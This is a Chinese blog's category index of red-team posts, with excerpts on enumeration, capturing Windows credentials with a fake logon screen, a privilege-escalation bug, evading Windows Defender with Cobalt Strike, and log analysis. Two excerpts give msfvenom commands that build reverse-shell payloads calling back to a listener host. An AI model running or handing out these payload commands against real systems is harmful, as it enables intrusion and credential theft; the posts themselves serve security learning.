会员
周边
新闻
博问
闪存
众包
赞助商
YouClaw
所有博客
当前博客
我的博客
我的园子
账号设置
会员中心
简洁模式
...
退出登录
注册
登录
GGbigboy
我们这个世界,从不会给一个伤心的落伍者颁发奖牌。
管理
随笔分类 -
工具
红队指南--第3章 列举
摘要:第3章 列举 贡献者:Hamza Mhirsi 翻译者 BugMan 介绍 攻击目标之前最重要的阶段是“侦察”。越努力 攻击者在此阶段投入攻击,成功的可能性就更大。之前 武器化阶段(获取权限),侦察分为四个阶段: 足迹 扫描 列举 漏洞评估 在枚举阶段,攻击者与目标建立活动连接并尝试获得有关它的实时
阅读全文
posted @
2020-02-25 13:15
GGbigboy
阅读(324)
评论(0)
推荐(0)
FakeLogonScreen抓取Windows凭证
摘要:FakeLogonScreen抓取Windows凭证 实践中使用的配置 攻击者: 操作系统: Kali Linux 2020.1 IP: 192.168.1.13 目标: 作业系统: Windows 10(Build 18363) IP: 192.168.1.11 情境 有一个系统与攻击者连接到相同
阅读全文
posted @
2020-02-23 10:08
GGbigboy
阅读(496)
评论(0)
推荐(0)
MSFVENOM SHELLCODE生成备忘录
摘要:MSFVENOM SHELLCODE生成 通用Shellcode msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 -f c -e generic/none Wind
阅读全文
posted @
2020-02-21 20:28
GGbigboy
阅读(639)
评论(0)
推荐(1)
CVE-2020-0668-Windows服务跟踪中的普通特权升级错误
摘要:CVE-2020-0668-Windows服务跟踪中的普通特权升级错误 在这里中,我将讨论在Windows Service跟踪中发现的任意文件移动漏洞。从我的测试来看,它影响了从Vista到10的所有Windows版本,但它可能更旧,因为XP中已经存在此功能。 服务跟踪是一项旧功能,我可以转换到Wi
阅读全文
posted @
2020-02-21 18:17
GGbigboy
阅读(439)
评论(0)
推荐(0)
Cobalt Strike Bypassing Windows Defender 使用混淆处理
摘要:Cobalt Strike – Bypassing Windows Defender 混淆处理 对于所有红色团队成员来说,在交付有效的替代品同时又不拖延延展组织的所有风吹草动始终是一个挑战。就像所有其他安全解决方案一样,Windows Defender在检测由Cobalt Strike等工具生成的通
阅读全文
posted @
2020-02-21 14:56
GGbigboy
阅读(903)
评论(0)
推荐(0)
Windwos日志分析
摘要:Windows日志分析工具 查看系统日志方法: 在“开始”菜单上,依次指向“所有程序”、“管理工具”,然后单击“事件查看器” 按 "Window+R",输入 ”eventvwr.msc“ 也可以直接进入“事件查看器” 对于Windows事件日志分析,不同的EVENT ID代表了不同的意义,摘录一些常
阅读全文
posted @
2020-02-13 20:52
GGbigboy
阅读(505)
评论(0)
推荐(0)
msf制作反弹shell
摘要:msf制作shell 1 .制作反弹shell-exe文件 执行命令 msfvenom -p windows/meterpreter/reverse_tcp LHOST=2x.94.50.153 LPORT=4433 -f exe -o 4433.exe LHOST为公网IP LPORT为反弹端口
阅读全文
posted @
2020-02-13 15:37
GGbigboy
阅读(2981)
评论(0)
推荐(0)
公告